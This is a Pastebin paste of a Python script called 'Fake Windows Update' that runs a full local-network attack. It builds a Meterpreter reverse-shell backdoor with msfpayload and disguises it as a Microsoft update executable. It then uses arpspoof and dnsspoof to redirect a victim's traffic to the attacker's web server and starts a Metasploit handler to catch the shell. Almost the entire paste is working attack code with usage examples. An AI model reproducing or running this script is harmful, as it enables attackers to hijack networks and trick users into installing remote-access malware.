Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import os
- import sys
- import subprocess
- import re
- from time import sleep
- if os.getuid() != 0:
- print 'requires root privileges.'
- sys.exit(1)
- def usage():
- if len(sys.argv) != 6:
- print 'Usage: ./fakeupdate.py [INTERFACE] [RHOST] [LHOST] [GATEWAY] [LPORT]'
- print 'EX) ./fakeupdate.py eth0 192.168.1.50 192.168.1.49 192.168.1.1 4444'
- sys.exit(1)
- usage()
- print """
- *********************************************************************
- \tFAKE WINDOWS UPDATE PYTHON SCRIPT\t
- \tWRITTEN BY : TEJASH PATEL\t
- \tFACEBOOK : https://www.facebook.com/tejash1991\t
- \tYOUTUBE CHANNEL : https://www.youtube.com/user/tejash1991\t
- \tHOW 2 USE SCRIPT : https://www.youtube.com/watch?v=hhIcAMHm0WA\t
- *********************************************************************
- """
- INTERFACE = sys.argv[1]
- RHOST = sys.argv[2]
- LHOST = sys.argv[3]
- GATEWAY = sys.argv[4]
- LPORT = sys.argv[5]
- print 'Starting web server'
- apacheserver = subprocess.Popen('/etc/init.d/apache2 start',shell=True).wait()
- print 'Create Backdoor Using Msfpayload'
- msfbackdoor = subprocess.Popen('msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X >/var/www/Microsoft-KB17112012.exe' %(LHOST,LPORT),shell=True).wait()
- try:
- my_dnsspoofing = open('/tmp/dnsspoofing.dns' , 'w')
- my_dnsspoofing.write("%s *" %LHOST)
- my_dnsspoofing.close()
- except IOerror:
- print 'Error in Writing in the File'
- else:
- print 'starting Dnsspoofing'
- dnsspoof = 'xterm -e dnsspoof -i %s -f /tmp/dnsspoofing.dns &' %INTERFACE
- os.system(dnsspoof)
- sleep(1)
- print 'start Arpspoof'
- arpspoofing = 'xterm -e arpspoof -i %s -t %s %s &' %(INTERFACE,RHOST,LHOST)
- os.system(arpspoofing)
- sleep(2)
- print 'Starting Metasploit Framework'
- #Metasploit = 'xterm -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s #E &' %(LHOST,LPORT)
- #os.system(Metasploit)
- #sleep(3)
- metasploit = subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s E' %(LHOST,LPORT),shell=True).wait()
- subprocess.Popen('rm -f /tmp/dnsspoofing.dns > /dev/null', shell=True).wait()
- subprocess.Popen('rm -f /var/www/Microsoft-KB17112012.exe > /dev/null', shell=True).wait()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement